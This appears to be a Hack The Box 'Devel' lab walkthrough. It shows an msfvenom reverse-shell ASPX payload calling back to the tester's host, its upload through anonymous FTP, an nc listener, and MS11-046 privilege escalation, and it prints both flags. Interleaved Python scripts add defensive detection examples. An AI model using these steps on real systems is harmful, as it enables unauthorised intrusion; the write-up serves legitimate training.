Devel

Introduction:
This is a Windows machine running an IIS web server and an FTP service, and it presents a few exploitable vulnerabilities. It's a very easy machine, and I avoided using Metasploit on it because I want to avoid or limit its usage as much as possible, keeping the OSCP in mind.
Recon

Nmap output
Nmap scan report for 10.10.10.5
Host is up (0.014s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 12-22-20  10:06PM                 2894 ex.aspx
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds

Notes:
- Anonymous FTP login is allowed on port 21
- IIS httpd 7.5 is running on Windows (Nmap's OS guesses: Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012)
- The potentially risky HTTP method TRACE is enabled, which seems interesting
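The three notes above are exactly what a triage script should pull out of a scan automatically. As an added example (not part of the original writeup, and not Nmap's own tooling), the Python below parses the port table and NSE script output of the report above into structured records and flags the anonymous FTP login, the risky HTTP method and the IIS version. The SAMPLE_NMAP text is a constructed copy of the relevant lines of the scan; the parsing rules (a script starts at a `| name:` or `|_name:` line, indented lines continue it) are my own reading of Nmap's output layout.

```python
import re

# Constructed sample: the port and script lines from the Nmap report above.
SAMPLE_NMAP = """\
Nmap scan report for 10.10.10.5
Host is up (0.014s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 12-22-20  10:06PM                 2894 ex.aspx
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# A new NSE script starts with "| name:" or "|_name:"; deeper-indented lines continue it.
SCRIPT_HEAD_RE = re.compile(r"^\|_? ?([A-Za-z][\w-]*):\s?(.*)$")


def parse_nmap(text):
    """Return one dict per port line, with its NSE script output grouped by script name."""
    ports = []
    current = None
    script_name = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": {},
            }
            ports.append(current)
            script_name = None
            continue
        if current is None or not line.startswith("|"):
            continue  # host-level lines, OS guesses etc. are not per-port data
        h = SCRIPT_HEAD_RE.match(line)
        if h:
            script_name = h.group(1)
            rest = h.group(2).strip()
            current["scripts"][script_name] = [rest] if rest else []
        elif script_name:
            current["scripts"][script_name].append(line.lstrip("|_ ").rstrip())
    return ports


def triage(ports):
    """Flag the findings a reviewer would note first: (port, description) tuples."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        scripts = p["scripts"]
        if "Anonymous FTP login allowed" in " ".join(scripts.get("ftp-anon", [])):
            findings.append((p["port"], "anonymous FTP login allowed"))
        m = re.search(r"Potentially risky methods:\s*(.+)", " ".join(scripts.get("http-methods", [])))
        if m:
            findings.append((p["port"], "risky HTTP methods: " + m.group(1).strip()))
        if "IIS httpd" in p["version"]:
            findings.append((p["port"], "Microsoft IIS " + p["version"].split()[-1]))
    return findings


if __name__ == "__main__":
    for port, note in triage(parse_nmap(SAMPLE_NMAP)):
        print(f"{port}/tcp: {note}")
```

Running it prints the three notes as `21/tcp: anonymous FTP login allowed`, `80/tcp: risky HTTP methods: TRACE` and `80/tcp: Microsoft IIS 7.5`; feeding it a full `nmap -sV -sC -oN` file works the same way since only the port and `|` lines are consumed.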
Enumeration
Going to the URL http://10.10.10.5/ shows the default IIS7 welcome page, which confirms that IIS is version 7.x.
$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:eneloop): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
12-22-20  10:06PM                 2894 ex.aspx
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp>

And we are able to upload files -
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>

This is great! Now, let's get on with the exploitation.
Exploitation
Low-level access
Using the anonymous FTP login, upload winPEAS -
# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:eneloop): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put winPEAS.bat
local: winPEAS.bat remote: winPEAS.bat
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
35761 bytes sent in 0.00 secs (7.9516 MB/s)
ftp>

Create shell.aspx with the msfvenom command below and upload it via FTP to the root of the web server as well (the first attempt below fails validation because lport was given without the = sign).
After starting the local listener, request this page in the browser; you should now have low-level shell access on this machine.
# msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.15 lport 4444 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Error: One or more options failed to validate: LPORT.
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/devel/data# msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.15 lport=4444 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2731 bytes
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/devel/data#
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/devel/data#
root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/devel/data# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:eneloop): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2766 bytes sent in 0.00 secs (4.9031 MB/s)
ftp>

Start the listener and browse to the reverse shell page.
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.5] 49165
ls
dir
pwd
l

 Directory: C:\windows\system32\inetsrv


Mode  LastWriteTime    Length Name
----  -------------    ------ ----
d---- 17/3/2017 4:37          config
d---- 17/3/2017 6:33          en-US
-a--- 14/7/2009 4:14   155648 appcmd.exe
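From the defender's side, the weakness exploited here is that the anonymous, writable FTP root is the same directory as the IIS web root, so any uploaded .aspx is executed server-side on the next request for it. As an added example (not part of the original writeup, and not a feature of IIS or winPEAS), the Python below is the kind of web-root integrity check that catches this: it hashes every file under the web root, diffs against a saved baseline, and alerts on new or modified files whose extension IIS would execute rather than serve as static content. The web root, file names and contents are constructed in a temporary directory to mirror the FTP listing above; the SERVER_SIDE_EXTS list is my own choice.

```python
import hashlib
import os
import tempfile

# File types IIS hands to a script engine or that run natively. A new file with one
# of these extensions appearing in the web root is the event worth alerting on.
SERVER_SIDE_EXTS = {".aspx", ".asp", ".ashx", ".asmx", ".cshtml", ".exe", ".dll", ".bat"}


def snapshot(root):
    """Map relative path (forward slashes) to the SHA-256 of every file under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                snap[rel] = hashlib.sha256(fh.read()).hexdigest()
    return snap


def diff_webroot(baseline, current):
    """Compare two snapshots; return sorted lists of (new, modified, removed) paths."""
    new = sorted(p for p in current if p not in baseline)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    removed = sorted(p for p in baseline if p not in current)
    return new, modified, removed


def suspicious(paths):
    """Keep only paths whose extension IIS would execute rather than serve as static content."""
    return [p for p in paths if os.path.splitext(p)[1].lower() in SERVER_SIDE_EXTS]


def demo():
    """Constructed scenario: a baseline web root matching the FTP listing, then an upload."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "aspnet_client"))
        baseline_files = {
            "iisstart.htm": b"<html><body>IIS7</body></html>",
            "welcome.png": b"\x89PNG\r\n\x1a\n",  # constructed stub, not a real image
            "aspnet_client/placeholder.txt": b"",
        }
        for rel, data in baseline_files.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        baseline = snapshot(root)  # in production this would be stored off-host

        # What the anonymous FTP upload in the walkthrough leaves behind: a new
        # server-side page. A modified static file is included for contrast.
        with open(os.path.join(root, "shell.aspx"), "wb") as fh:
            fh.write(b'<%@ Page Language="C#" %>\n')  # constructed placeholder content
        with open(os.path.join(root, "iisstart.htm"), "wb") as fh:
            fh.write(b"<html><body>changed</body></html>")

        new, modified, removed = diff_webroot(baseline, snapshot(root))
        return {"new": new, "modified": modified, "removed": removed,
                "alert": suspicious(new + modified)}


if __name__ == "__main__":
    print(demo())
```

In the constructed run, `new` is `['shell.aspx']`, `modified` is `['iisstart.htm']`, and only `shell.aspx` survives the `suspicious` filter; the modified static page is reported but not escalated. The same separation of the FTP and web roots, or removing write access for anonymous users, is the actual fix, and this check is the detective control for when that configuration drifts.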
Let's run winPEAS.bat and gather more information so we can elevate our access.

 [+] CURRENT USER
The request will be processed at a domain controller for domain HTB.


USER INFORMATION
----------------

User Name       SID
=============== ==============================================================
iis apppool\web S-1-5-82-2971860261-2701350812-2118117159-340795515-2183480550


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

 [+] USERS

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babis                    Guest
The command completed with one or more errors.


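The facts worth extracting from that dump are few: the principal is an IIS application pool identity (the S-1-5-82 SID prefix), its integrity level, and which high-impact token privileges it holds. As an added example, not part of the original writeup and not winPEAS code, here is a parser for `whoami /all`-style output that pulls those out and turns them into review findings. SAMPLE_WHOAMI is a constructed excerpt of the tables above (fewer rows, column spacing changed), and the HIGH_IMPACT table with its one-line descriptions is my own summary of the privileges hardening baselines tell you not to give service accounts that run attacker-influenced code.

```python
import re

# Constructed sample: a few rows from the USER, GROUP and PRIVILEGES tables above.
SAMPLE_WHOAMI = r"""
USER INFORMATION
----------------

User Name       SID
=============== ====
iis apppool\web S-1-5-82-2971860261-2701350812-2118117159-340795515-2183480550

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ====
Mandatory Label\High Mandatory Level Label            S-1-16-12288
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Token privileges that hardening baselines treat as equivalent to local admin when
# held by an account that executes attacker-influenced code (my own summary table).
HIGH_IMPACT = {
    "SeImpersonatePrivilege": "impersonate any client that connects to the process",
    "SeAssignPrimaryTokenPrivilege": "start processes under another token",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

USER_RE = re.compile(r"^(.+?)\s+(S-1-\d+(?:-\d+)+)\s*$")
LABEL_RE = re.compile(r"^Mandatory Label\\(.+?)\s+Label\s+(S-1-16-\d+)")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_all(text):
    """Parse `whoami /all`-style output into user, SID, integrity label and privilege states."""
    info = {"user": None, "sid": None, "integrity": None, "privileges": {}}
    section = None
    for line in text.splitlines():
        if line.endswith("INFORMATION"):
            section = line  # "USER INFORMATION", "GROUP INFORMATION", ...
            continue
        if section == "USER INFORMATION":
            m = USER_RE.match(line)
            if m and info["user"] is None:
                info["user"], info["sid"] = m.group(1), m.group(2)
        elif section == "GROUP INFORMATION":
            m = LABEL_RE.match(line)
            if m:
                info["integrity"] = m.group(1)
        elif section == "PRIVILEGES INFORMATION":
            m = PRIV_RE.match(line)
            if m:
                info["privileges"][m.group(1)] = m.group(3)
    return info


def audit(info):
    """Return the findings a reviewer would raise about this token, most general first."""
    findings = []
    if info["sid"] and info["sid"].startswith("S-1-5-82-"):
        findings.append("principal is an IIS application pool identity")
    for name, state in info["privileges"].items():
        if name in HIGH_IMPACT:
            # A Disabled privilege is still held by the token; the process can turn it
            # on with AdjustTokenPrivileges, so it is reported the same as Enabled.
            findings.append(f"{name} ({state}): {HIGH_IMPACT[name]}")
    return findings


if __name__ == "__main__":
    parsed = parse_whoami_all(SAMPLE_WHOAMI)
    print(parsed["user"], parsed["integrity"])
    for finding in audit(parsed):
        print(" -", finding)
```

On the sample this reports the app pool identity and both SeImpersonatePrivilege (Enabled) and SeAssignPrimaryTokenPrivilege (Disabled), and says nothing about SeChangeNotifyPrivilege or SeCreateGlobalPrivilege. The Disabled case is the one people miss when eyeballing the table, which is why the check keys on the privilege being present rather than on its state.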
Possible exploits -
You will find a bunch of exploits that this machine is potentially vulnerable to, so you can go dozens of different ways from here depending on which exploit you would like to use.
The tools I find useful -
WESNG : https://github.com/bitsadmin/wesng.git
Windows-Exploit-Suggester : https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
Post-exploit/PrivEsc
The MS11-046 exploit seems applicable based on the suggestions, and you can download it from this repo - https://github.com/abatchy17/WindowsExploits
Now, transfer the exploit over and run it to escalate your privileges.
c:\>cd inetpub\wwwroot
cd inetpub\wwwroot

c:\inetpub\wwwroot>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\inetpub\wwwroot

23/12/2020  06:10    <DIR>          .
23/12/2020  06:10    <DIR>          ..
18/03/2017  01:06    <DIR>          aspnet_client
23/12/2020  06:05             1.442 cmdasp.aspx
17/03/2017  04:37               689 iisstart.htm
23/12/2020  06:03           112.815 MS11-046.exe
23/12/2020  06:10             2.766 shell.aspx
17/03/2017  04:37           184.946 welcome.png
               5 File(s)        302.658 bytes
               3 Dir(s)  22.106.157.056 bytes free

c:\inetpub\wwwroot>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

c:\Windows\System32>cd C:\Users
cd C:\Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\Users

18/03/2017  01:16    <DIR>          .
18/03/2017  01:16    <DIR>          ..
18/03/2017  01:16    <DIR>          Administrator
17/03/2017  04:17    <DIR>          babis
18/03/2017  01:06    <DIR>          Classic .NET AppPool
14/07/2009  09:20    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  22.106.144.768 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\Users\Administrator

18/03/2017  01:16    <DIR>          .
18/03/2017  01:16    <DIR>          ..
18/03/2017  01:16    <DIR>          Contacts
18/03/2017  01:17    <DIR>          Desktop
18/03/2017  01:16    <DIR>          Documents
18/03/2017  01:16    <DIR>          Downloads
18/03/2017  01:16    <DIR>          Favorites
18/03/2017  01:16    <DIR>          Links
18/03/2017  01:16    <DIR>          Music
18/03/2017  01:16    <DIR>          Pictures
18/03/2017  01:16    <DIR>          Saved Games
18/03/2017  01:16    <DIR>          Searches
18/03/2017  01:16    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  22.106.144.768 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\Users\Administrator\Desktop

18/03/2017  01:17    <DIR>          .
18/03/2017  01:17    <DIR>          ..
18/03/2017  01:17                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  22.106.144.768 bytes free

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b
C:\Users\Administrator\Desktop>cd ../../babes
cd ../../babes
The system cannot find the path specified.

C:\Users\Administrator\Desktop>cd ../..
cd ../..

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\Users

18/03/2017  01:16    <DIR>          .
18/03/2017  01:16    <DIR>          ..
18/03/2017  01:16    <DIR>          Administrator
17/03/2017  04:17    <DIR>          babis
18/03/2017  01:06    <DIR>          Classic .NET AppPool
14/07/2009  09:20    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  22.106.025.984 bytes free

C:\Users>cd babis
cd babis

C:\Users\babis>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\Users\babis

17/03/2017  04:17    <DIR>          .
17/03/2017  04:17    <DIR>          ..
17/03/2017  04:17    <DIR>          Contacts
18/03/2017  01:14    <DIR>          Desktop
17/03/2017  04:17    <DIR>          Documents
17/03/2017  04:17    <DIR>          Downloads
17/03/2017  04:17    <DIR>          Favorites
17/03/2017  04:17    <DIR>          Links
17/03/2017  04:17    <DIR>          Music
17/03/2017  04:17    <DIR>          Pictures
17/03/2017  04:17    <DIR>          Saved Games
17/03/2017  04:17    <DIR>          Searches
17/03/2017  04:17    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  22.106.025.984 bytes free

C:\Users\babis>cd Desktop
cd Desktop

C:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of C:\Users\babis\Desktop

18/03/2017  01:14    <DIR>          .
18/03/2017  01:14    <DIR>          ..
18/03/2017  01:18                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  22.106.025.984 bytes free

C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
C:\Users\babis\Desktop>

Notes: